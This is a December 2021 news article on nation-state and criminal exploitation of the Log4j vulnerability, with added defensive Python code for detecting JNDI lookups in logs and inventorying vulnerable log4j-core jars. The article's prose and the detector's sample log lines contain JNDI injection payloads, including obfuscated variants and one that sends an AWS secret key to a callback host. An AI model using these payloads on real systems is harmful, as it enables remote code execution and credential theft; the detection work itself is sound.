Nation-state attackers wielding Log4j against targets

Third Party Risk Management, Application Security, Breach Notification

Exploitation traced to China, Iran, North Korea, Turkey; Minecraft servers hit with ransomware

Mathew J. Schwartz (euroinfosec)
December 16, 2021

Source: National Vulnerability Database

The imperative to find and fix all instances of a vulnerability in widely used Apache software continues to grow.


Cybersecurity experts warn that a number of nation-state-linked attackers appear to be abusing or actively testing the Apache Log4j vulnerability. Criminal groups have also begun targeting the flaw to drop malicious code, including crypto-locking malware, and well-known initial access brokers are using it to obtain corporate network access that they then sell to other attackers, including ransomware groups, some experts warn.

Maintained by the nonprofit Apache Software Foundation, Log4j provides logging for Java applications and is widely used, including in many other Apache projects and in countless third-party products that bundle it. The vulnerability, which has existed for years, is present in the Apache Log4j library from versions 2.0-beta9 through 2.14.1, and the U.S. Cybersecurity and Infrastructure Security Agency has said organizations should treat remediation as the highest priority.

On Thursday, John Graham-Cumming, CTO of web infrastructure provider Cloudflare, said the company was tracking more than 100,000 attempts per minute to find or exploit Log4j.

Designated CVE-2021-44228, the vulnerability "exists in the action the Java Naming and Directory Interface, or JNDI, takes to resolve variables," CISA said. Affected versions of Log4j "contain JNDI features, such as message lookup substitution, that do not protect against adversary-controlled LDAP and other JNDI-related endpoints," according to the U.S. government's vulnerability details. In practice, that means an attacker who can get a string such as ${jndi:ldap://attacker-host/...} written to a log, for example by placing it in an HTTP User-Agent header or a chat message, can make the vulnerable application connect to a server the attacker controls and load attacker-supplied code.
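Because the lookup syntax that triggers the bug also offers nested lookups such as ${lower:...}, ${upper:...} and the ${...:-default} form, in-the-wild probes rarely contain the literal string "jndi". The Python detector below is an added example, not code from the article, CISA or Microsoft: it collapses those nested lookups the way Log4j would, then reports any JNDI lookup that survives together with its protocol and callback host. The log lines are constructed for the example (the addresses are documentation ranges), and the lower/upper/default-value handling covers the common obfuscation forms rather than every lookup Log4j supports.

```python
import re
from typing import Optional

# Innermost Log4j lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup that survives normalization: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Evaluate one Log4j-style lookup body. Returns the substituted text, or
    None for a JNDI lookup, which is left in place so the detector can see it."""
    if body.lstrip().lower().startswith("jndi:"):
        return None
    # Default-value form ${prefix:key:-default} evaluates to 'default'; ${::-x} is
    # the degenerate case attackers use to spell out 'jndi' one letter at a time.
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    # Any other lookup (env, sys, ctx, date, ...): keep its name visible, e.g.
    # <env:AWS_SECRET_ACCESS_KEY>, but drop the ${ } so normalization terminates.
    # Such a reference inside the callback URL is a strong exfiltration indicator.
    return "<" + body + ">"


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse innermost lookups until only JNDI lookups (or none) remain."""
    for _ in range(max_rounds):
        changed = False

        def _sub(m) -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST.sub(_sub, text)
        if not changed:
            break
    return text


def detect(line: str) -> Optional[dict]:
    """Return details of a JNDI lookup in one log line, or None if the line is clean."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    host = re.match(r"\s*//([^/}\s]+)", norm[m.end():])
    return {
        "scheme": m.group(1).lower(),
        "callback": host.group(1) if host else None,
        "normalized": norm,
        "obfuscated": norm != line,
    }


def scan(lines) -> list:
    """Run detect() over an iterable of log lines; returns (line_no, details) pairs."""
    return [(i, hit) for i, l in enumerate(lines, 1) if (hit := detect(l))]


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    # plain payload in the query string
    '203.0.113.7 - - [10/Dec/2021:13:00:01 +0000] "GET /?q=${jndi:ldap://198.51.100.23:1389/a} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    # same callback, spelled out with lower/upper/default-value lookups in the User-Agent
    '203.0.113.7 - - [10/Dec/2021:13:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:l}dap://198.51.100.23:1389/Exploit}"',
    # benign line that happens to carry a ${...} property reference
    '203.0.113.8 - - [10/Dec/2021:13:00:03 +0000] "GET /docs?path=${user.home}/notes HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    # RMI transport, every letter via ::- defaults, environment variable exfiltrated in the path
    '203.0.113.9 - - [10/Dec/2021:13:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.24:1099/${env:AWS_SECRET_ACCESS_KEY}}"',
]

if __name__ == "__main__":
    for line_no, hit in scan(SAMPLE_LOG):
        print(f"line {line_no}: {hit['scheme']} -> {hit['callback']} (obfuscated={hit['obfuscated']})")
```

Run it over exported web, proxy or application logs rather than only edge logs: the lookup fires wherever the string is eventually logged, which may be several hops behind the system that received it, and the callback host is what to hunt for in outbound LDAP/RMI connection records.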

The EU's cybersecurity agency, ENISA, says that "due to the nature of the vulnerability, its pervasiveness and the complexity of patching in some of the affected environments," it is imperative that all organizations "assess their potential exposure as soon as possible."

But it's unclear when that will be possible, says Charles Carmakal, CTO of Mandiant. "Companies are struggling to identify all the vulnerable Log4j instances in their business. Applying fixes is not trivial. Many vendors are still in the process of determining whether their software uses Log4j, as organizations anxiously wait to see if they need to apply emergency fixes," he says. "Closed-box systems, vendor-managed systems, and software that is no longer maintained – but still running in test or even production environments – add complexity and pain."

Nation-state attacks

Momentum to mitigate the flaw and apply fixes as quickly as possible increased after cybersecurity firms CrowdStrike and Mandiant warned this week that they had seen Chinese and Iranian APT groups targeting CVE-2021-44228.

Microsoft on Wednesday reported seeing a range of APT activity, traced not only to China and Iran but also to attackers affiliated with North Korea and Turkey.

"The activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor's objectives," Microsoft said.

For example, Microsoft says it saw an Iranian APT group known as Charming Kitten, Phosphorus and TA453 "acquiring and making modifications of the Log4j exploit," and it believes the group could now use the attack code in the wild.

Microsoft also says it saw a Chinese APT group known as Hafnium, aka APT31 and APT40, use the exploit to identify new targets. The group was linked to a series of zero-day attacks on Exchange servers earlier this year, launched through virtual private servers leased primarily in the United States.

In the latest attacks, "Hafnium-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems," Microsoft said.

Criminal activity

Criminals have also targeted the flaw to deploy malware on Linux systems, as well as the .NET ransomware called Khonsari against Windows endpoints, as detailed by security firm Bitdefender.

Attackers have also hit Minecraft servers not managed by Microsoft, the company's security researchers warn, saying the aim of the attacks appears to be not only to deploy Khonsari ransomware on the servers but also to harvest credentials for later use.

"While it's uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials," Microsoft says. "These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use."

Well-known initial access brokers have also targeted the flaw to gain access to corporate networks. "These access brokers then sell access to these networks to ransomware-as-a-service affiliates," and others, Microsoft says.

Advice: update to version 2.16

To fix the flaw, Apache released Log4j 2.15.0 on Friday. On Monday, Apache followed with Log4j 2.16.0, which includes a fix for a newly discovered vulnerability, CVE-2021-45046, that could be used to cause a denial of service. Version 2.16.0 also disables JNDI access by default and removes support for message lookups altogether, closing the substitution path the exploit relies on rather than filtering it.

Experts recommend that organizations first apply version 2.16.0 to anything not yet updated to 2.15.0, and then update all systems running 2.15 to 2.16 (see: How to Patch Log4j Now That Version 2.16 Is Out).
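Both the inventory problem Carmakal describes and the 2.15-to-2.16 upgrade advice come down to knowing which log4j-core versions are actually on disk, including copies bundled inside application jars and wars that a package manager never sees. The Python scanner below is an added example, not code from the article, Apache or CISA: it reads the Maven pom.properties that log4j-core ships with, checks whether JndiLookup.class is still present (its removal was the documented mitigation for versions that could not be upgraded), recurses into nested archives, and classifies each hit against the version ranges the article gives. It is demonstrated on constructed stand-in archives rather than real Log4j binaries; jars repackaged without pom.properties are reported as unknown rather than guessed at.

```python
import io
import os
import re
import tempfile
import zipfile

# Entries inside log4j-core that identify the version and the vulnerable class.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(v: str) -> tuple:
    """Sortable key for Log4j 2 versions: '2.0-beta9' < '2.0-rc1' < '2.0' < '2.14.1'."""
    num, _, pre = v.partition("-")
    parts = [int(x) for x in num.split(".")]
    parts += [0] * (3 - len(parts))
    if not pre:
        return (*parts, 1, 0, 0)  # a final release sorts after any of its pre-releases
    tag = re.match(r"[a-zA-Z]+", pre)
    rank = {"alpha": 0, "beta": 1, "rc": 2}.get(tag.group(0).lower() if tag else "", 0)
    return (*parts, 0, rank, int(re.sub(r"\D", "", pre) or 0))


FIRST_VULNERABLE = parse_version("2.0-beta9")
LAST_44228 = parse_version("2.14.1")
FIXED = parse_version("2.16.0")


def classify(version, has_jndi_lookup: bool) -> str:
    """Map a log4j-core version (and whether JndiLookup.class is present) to a verdict."""
    if version is None:
        return "log4j-core present but version unknown: inspect manually"
    key = parse_version(version)
    if key < FIRST_VULNERABLE:
        return "predates the JNDI lookup, outside the CVE-2021-44228 range"
    if key <= LAST_44228:
        if not has_jndi_lookup:
            return "mitigated: JndiLookup.class removed, still upgrade to 2.16.0"
        return "VULNERABLE to CVE-2021-44228: upgrade to 2.16.0"
    if key < FIXED:
        return "2.15.0: affected by CVE-2021-45046, upgrade to 2.16.0"
    return "patched (2.16.0 or later)"


def inspect_archive(data: bytes, name: str) -> list:
    """Inspect one archive held in memory, recursing into bundled jars (fat jars, wars)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                key, _, val = line.partition("=")
                if key.strip() == "version":
                    version = val.strip()
        has_lookup = JNDI_LOOKUP in names
        if version is not None or has_lookup:
            findings.append((name, version, classify(version, has_lookup)))
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(inspect_archive(zf.read(inner), f"{name}!{inner}"))
    return findings


def scan_tree(root: str) -> dict:
    """Walk a directory tree; returns {archive path relative to root ('!' marks nesting): verdict}."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, f)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    for name, _ver, verdict in inspect_archive(fh.read(), rel):
                        results[name] = verdict
            except zipfile.BadZipFile:
                results[rel] = "unreadable archive"
    return results


def _fixture_jar(version, include_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()


def demo() -> dict:
    """Build a small tree of constructed archives in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        cases = {
            "lib/log4j-core-2.14.1.jar": _fixture_jar("2.14.1", True),
            "lib/log4j-core-2.14.1-stripped.jar": _fixture_jar("2.14.1", False),
            "lib/log4j-core-2.15.0.jar": _fixture_jar("2.15.0", True),
            "lib/log4j-core-2.16.0.jar": _fixture_jar("2.16.0", True),
        }
        war = io.BytesIO()  # a web app that bundles an old log4j-core one level deep
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", _fixture_jar("2.13.3", True))
        cases["app.war"] = war.getvalue()
        for rel, data in cases.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        return scan_tree(root)


if __name__ == "__main__":
    for archive, verdict in sorted(demo().items()):
        print(f"{archive}: {verdict}")
```

Point scan_tree() at application and vendor install directories, not just the system package paths, and treat a result of "mitigated" as a temporary state: removing JndiLookup.class stops CVE-2021-44228 but leaves the rest of the old release in place, so the upgrade to 2.16.0 is still the goal.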

“We are taking urgent action to mitigate this vulnerability and detect any associated threatening activity,” said CISA Director Jen Easterly.

CISA has added CVE-2021-44228 to its Known Exploited Vulnerabilities catalog. This "requires federal civilian agencies, and signals to non-federal partners, to urgently patch or remediate this vulnerability," Easterly said.

"We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability," she said.

CISA urged any U.S. organization that falls victim to a Log4j attack to immediately report the incident to CISA or the FBI.

In addition, CISA continues to provide updated guidance on the Apache Log4j vulnerabilities and maintains a list of software known to be affected, as well as software confirmed to be unaffected, which currently has more than 750 entries.

Imperative: rapid mitigation and remediation

CISA has given civilian federal executive branch agencies a Dec. 24 deadline to fix CVE-2021-44228. It also urged them to immediately deploy web application firewalls to block attack attempts and to trigger security operations center alerts if such attacks hit the network. Because the lookup syntax can be nested and obfuscated, WAF blocking is a stopgap that buys time for patching rather than a substitute for it.

However, many vendors and software development projects that use the library have yet to determine whether their tools are vulnerable and to prepare a fix. Even as they apply patches, experts say organizations should assume that attackers have already used the vulnerability against them until proven otherwise. "Patches do not remove existing compromise," says Jake Williams, CTO of cybersecurity firm BreachQuest.

Because of the pervasiveness of the vulnerability and the number of different pieces of software that need updating, John Hultquist, vice president of intelligence analysis at Mandiant, expects the impact to be felt for some time. "The effects of this vulnerability will reverberate for months, maybe even years, as we try to close these doors and hunt down every actor who has entered," he says.
